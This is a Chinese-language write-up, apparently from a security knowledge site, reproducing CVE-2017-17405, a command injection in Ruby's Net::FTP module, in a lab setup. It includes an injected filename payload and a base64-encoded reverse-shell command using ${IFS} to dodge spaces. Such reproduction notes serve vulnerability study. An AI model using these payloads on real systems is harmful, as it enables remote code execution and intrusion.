menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right (CVE-2017-17405)NetFTP 模块命令注入漏洞 chevron_right (CVE-2017-17405)NetFTP 模块命令注入漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2017-17405)NetFTP 模块命令注入漏洞.md
    1.58 KB / 2021-07-15 19:57:34
        (CVE-2017-17405)Net::FTP 模块命令注入漏洞
    ===========================================
    
    一、漏洞简介
    ------------
    
    Ruby Net::FTP
    模块是一个FTP客户端,在上传和下载文件的过程中,打开本地文件时使用了`open`函数。而在ruby中,`open`函数是借用系统命令来打开文件,且没用过滤shell字符,导致在用户控制文件名的情况下,将可以注入任意命令。
    
    二、漏洞影响
    ------------
    
    Ruby \< 2.4.3
    
    三、复现过程
    ------------
    
    因为这是一个FTP客户端的漏洞,所以我们需要先运行一个可以被访问到的服务端。比如使用python:
    
        # 安装pyftpdlib
        pip install pyftpdlib
    
        # 在当前目录下启动一个ftp服务器,默认监听在`0.0.0.0:2121`端口
        python3 -m pyftpdlib -p 2121 -i 0.0.0.0
    
    然后即可开始利用漏洞。注入命令`|touch${IFS}success.txt`(空格用`${IFS}`代替,原因不表),发送如下数据包即可(其中uri指定的ftp服务器就是我用python运行的一个简单的ftp
    server,其中无需放置任何文件):
    
    ![1.png](./resource/(CVE-2017-17405)Net::FTP模块命令注入漏洞/media/rId24.png)
    
    然后进入docker容器内,可见success.txt已被创建:
    
    ![2.png](./resource/(CVE-2017-17405)Net::FTP模块命令注入漏洞/media/rId25.png)
    
    执行反弹shell的命令`|bash${IFS}-c${IFS}'{echo,YmFzaCAtaSA...}|{base64,-d}|{bash,-i}'`,成功反弹:
    
    ![3.png](./resource/(CVE-2017-17405)Net::FTP模块命令注入漏洞/media/rId26.png)
    
    参考链接
    --------
    
    > https://vulhub.org/\#/environments/ruby/CVE-2017-17405/
    
    
    links
    file_download